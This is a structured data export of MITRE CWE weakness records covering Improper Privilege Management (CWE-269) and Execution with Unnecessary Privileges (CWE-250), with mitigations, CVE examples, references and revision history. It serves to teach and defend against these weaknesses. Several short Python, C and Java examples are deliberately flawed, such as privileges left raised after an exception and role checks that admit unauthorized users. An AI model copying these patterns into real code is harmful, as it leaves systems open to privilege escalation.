"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2024-11-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-11-19",
"ModificationVersion": "4.16",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Suggested mappings to ISA/IEC 62443.",
"ContributionDate": "2023-06-29",
"ContributionName": "\"Mapping CWE to 62443\" Sub-Working Group",
"ContributionOrganization": "CWE-CAPEC ICS/OT SIG",
"ContributionReleaseDate": "2023-06-29",
"ContributionType": "Content",
"ContributionVersion": "4.12",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "Provided diagram to improve CWE usability",
"ContributionDate": "2024-02-29",
"ContributionName": "Abhi Balakrishnan",
"ContributionOrganization": null,
"ContributionReleaseDate": "2024-07-16",
"ContributionType": "Content",
"ContributionVersion": "4.15",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-09-09",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Privilege Management Error",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insecure Privilege Management",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Discouraged
|
CWE-269 is commonly misused. It can be conflated with "privilege escalation," which is a technical impact that is listed in many low-information vulnerability reports [REF-1287]. It is not useful for trend analysis.
|
If an error or mistake allows privilege escalation, then use the CWE ID for that mistake. Avoid using CWE-269 when only phrases such as "privilege escalation" or "gain privileges" are available, as these indicate technical impact of the vulnerability - not the root cause weakness. If the root cause seems to be directly related to privileges, then examine the children of CWE-269 for additional hints, such as Execution with Unnecessary Privileges (CWE-250) or Incorrect Privilege Assignment (CWE-266).
|
[
"Frequent Misuse"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code temporarily raises the program's privileges to allow creation of a new user folder.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tdef makeNewUserDir(username):\n\t\t\tif invalidUsername(username):\n```\n#avoid CWE-22 and CWE-78* \n\t\t\t\t\tprint('Usernames cannot contain invalid characters')\n\t\t\t\t\treturn False\n\t\t\ttry:\n\t\t\t```\n\t\t\t\traisePrivileges()\n\t\t\t\tos.mkdir('/home/' + username)\n\t\t\t\tlowerPrivileges()\n\t\t\texcept OSError:\n\t\t\t\tprint('Unable to create new user directory for user:' + username)\n\t\t\t\treturn False\n\t\t\treturn True\n```",
"IntroText": null,
"Language": "Python",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-126"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example demonstrates the weakness.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tseteuid(0);\n```\n/* do some stuff */* \n\t\n\tseteuid(getuid());",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
}
],
"ID": "DX-97"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example demonstrates the weakness.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tAccessController.doPrivileged(new PrivilegedAction() {\n\t\t\tpublic Object run() {\n```\n// privileged code goes here, for example:* \n\t\t\t\tSystem.loadLibrary(\"awt\");\n\t\t\t\treturn null;\n\t\t\t\t\n\t\t\t\t *// nothing to return* \n\t\t\t\t}",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
}
],
"ID": "DX-142"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code intends to allow only Administrators to print debug information about a system.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic enum Roles {\n\t\tADMIN,USER,GUEST\n\t}\n\tpublic void printDebugInfo(User requestingUser){\n\t\t\tif(isAuthenticated(requestingUser)){\n\t\t\t\t\tswitch(requestingUser.role){\n\t\t\t\t\t\t\tcase GUEST:\n\t\t\t\t\t\t\t\tSystem.out.println(\"You are not authorized to perform this command\");\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tSystem.out.println(currentDebugState());\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tSystem.out.println(\"You must be logged in to perform this command\");\n\t\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \"GUEST\". Someone with the role of \"ADMIN\" or \"USER\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-127"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code allows someone with the role of \"ADMIN\" or \"OPERATOR\" to reset a user's password. The role of \"OPERATOR\" is intended to have less privileges than an \"ADMIN\", but still be able to help users with small issues such as forgotten passwords.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic enum Roles {\n\t\tADMIN,OPERATOR,USER,GUEST\n\t}\n\tpublic void resetPassword(User requestingUser, User user, String password ){\n\t\t\tif(isAuthenticated(requestingUser)){\n\t\t\t\t\tswitch(requestingUser.role){\n\t\t\t\t\t\t\tcase GUEST:\n\t\t\t\t\t\t\t\tSystem.out.println(\"You are not authorized to perform this command\");\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase USER:\n\t\t\t\t\t\t\t\tSystem.out.println(\"You are not authorized to perform this command\");\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tsetPassword(user,password);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\telse{\n\t\t\t\tSystem.out.println(\"You must be logged in to perform this command\");\n\t\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-128"
}
] | null |
/data/images/CWE-269-Diagram.png
|
Medium
| null | 1
|
[
[
"284",
"269"
]
] |
[
"250",
"266",
"267",
"268",
"270",
"271",
"274",
"648"
] |
250
|
Execution with Unnecessary Privileges
|
Base
|
Simple
|
Draft
|
The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.
|
New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges.
Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Mobile",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "\n\nREALIZATION: This weakness is caused during implementation of an architectural security tactic.\n",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Installation"
},
{
"Note": "\n\nIf an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe.\n",
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity",
"Execute Unauthorized Code or Commands",
"Read Application Data",
"DoS: Crash, Exit, or Restart"
],
"Likelihood": null,
"Note": "An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data.",
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-17",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Environment Hardening"
},
{
"Description": "Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-18",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
},
{
"Description": "Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-18",
"Phase": [
"Architecture and Design"
],
"Strategy": "Attack Surface Reduction"
},
{
"Description": "Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-19",
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Ensure that the software runs properly under the United States Government Configuration Baseline (USGCB) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-37",
"Phase": [
"Operation",
"System Configuration"
],
"Strategy": "Environment Hardening"
}
] |
[
{
"Description": "FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-4217",
"Reference": "CVE-2007-4217"
},
{
"Description": "Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-1877",
"Reference": "CVE-2008-1877"
},
{
"Description": "OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-5159",
"Reference": "CVE-2007-5159"
},
{
"Description": "Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-4638",
"Reference": "CVE-2008-4638"
},
{
"Description": "Program does not drop privileges before calling another program, allowing code execution.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-0162",
"Reference": "CVE-2008-0162"
},
{
"Description": "setuid root program allows creation of arbitrary files through command line argument.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-0368",
"Reference": "CVE-2008-0368"
},
{
"Description": "Installation script installs some programs as setuid when they shouldn't be.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-3931",
"Reference": "CVE-2007-3931"
},
{
"Description": "mail program runs as root but does not drop its privileges before attempting to access a file. Attacker can use a symlink from their home directory to a directory only readable by root, then determine whether the file exists based on the response.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-3812",
"Reference": "CVE-2020-3812"
},
{
"Description": "Product launches Help functionality while running with raised privileges, allowing command execution using Windows message to access \"open file\" dialog.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2003-0908",
"Reference": "CVE-2003-0908"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Often Misused: Privilege Management",
"MappingFit": null,
"TaxonomyName": "7 Pernicious Kingdoms"
},
{
"EntryID": "SER09-J",
"EntryName": "Minimize privileges before deserializing from a privilege context",
"MappingFit": null,
"TaxonomyName": "The CERT Oracle Secure Coding Standard for Java (2011)"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.03.05 BR",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.03.08 BR",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.03.08 RE(1)",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.05.07 BR",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.09.02 RE(4)",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.09.03 BR",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.09.04 BR",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 1.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 1.2",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 2.1 RE 1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SD-4",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CCSC 3",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 1.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] |
[
"104",
"470",
"69"
] |
[
{
"Authors": [
"Katrina Tsipenyuk",
"Brian Chess",
"Gary McGraw"
],
"Edition": null,
"ExternalReferenceID": "REF-6",
"Publication": "NIST Workshop on Software Security Assurance Tools Techniques and Metrics",
"PublicationDay": "07",
"PublicationMonth": "11",
"PublicationYear": "2005",
"Publisher": "NIST",
"Section": null,
"Title": "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors",
"URL": "https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf",
"URLDate": null
},
{
"Authors": [
"Jerome H. Saltzer",
"Michael D. Schroeder"
],
"Edition": null,
"ExternalReferenceID": "REF-196",
"Publication": "Proceedings of the IEEE 63",
"PublicationDay": null,
"PublicationMonth": "09",
"PublicationYear": "1975",
"Publisher": null,
"Section": null,
"Title": "The Protection of Information in Computer Systems",
"URL": "http://web.mit.edu/Saltzer/www/publications/protection/",
"URLDate": null
},
{
"Authors": [
"Sean Barnum",
"Michael Gegick"
],
"Edition": null,
"ExternalReferenceID": "REF-76",
"Publication": null,
"PublicationDay": "14",
"PublicationMonth": "09",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Least Privilege",
"URL": "https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 7, \"Running with Least Privilege\" Page 207",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"NIST"
],
"Edition": null,
"ExternalReferenceID": "REF-199",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "United States Government Configuration Baseline (USGCB)",
"URL": "https://csrc.nist.gov/Projects/United-States-Government-Configuration-Baseline",
"URLDate": "2023-03-28"
},
{
"Authors": [
"Michael Howard",
"David LeBlanc",
"John Viega"
],
"Edition": null,
"ExternalReferenceID": "REF-44",
"Publication": "McGraw-Hill",
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2010",
"Publisher": null,
"Section": "\"Sin 16: Executing Code With Too Much Privilege.\" Page 243",
"Title": "24 Deadly Sins of Software Security",
"URL": null,
"URLDate": null
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 9, \"Privilege Vulnerabilities\", Page 477",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] |
[
{
"Note": "There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible.",
"Type": "Relationship"
},
{
"Note": "CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The \"least privilege\" phrase has multiple interpretations.",
"Type": "Maintenance"
},
{
"Note": "The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the \"Mapping CWE to 62443\" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "7 Pernicious Kingdoms",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction",
"ModificationDate": "2009-01-12",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Potential_Mitigations, References",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Relationships",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References, Relationships",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Related_Attack_Patterns, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
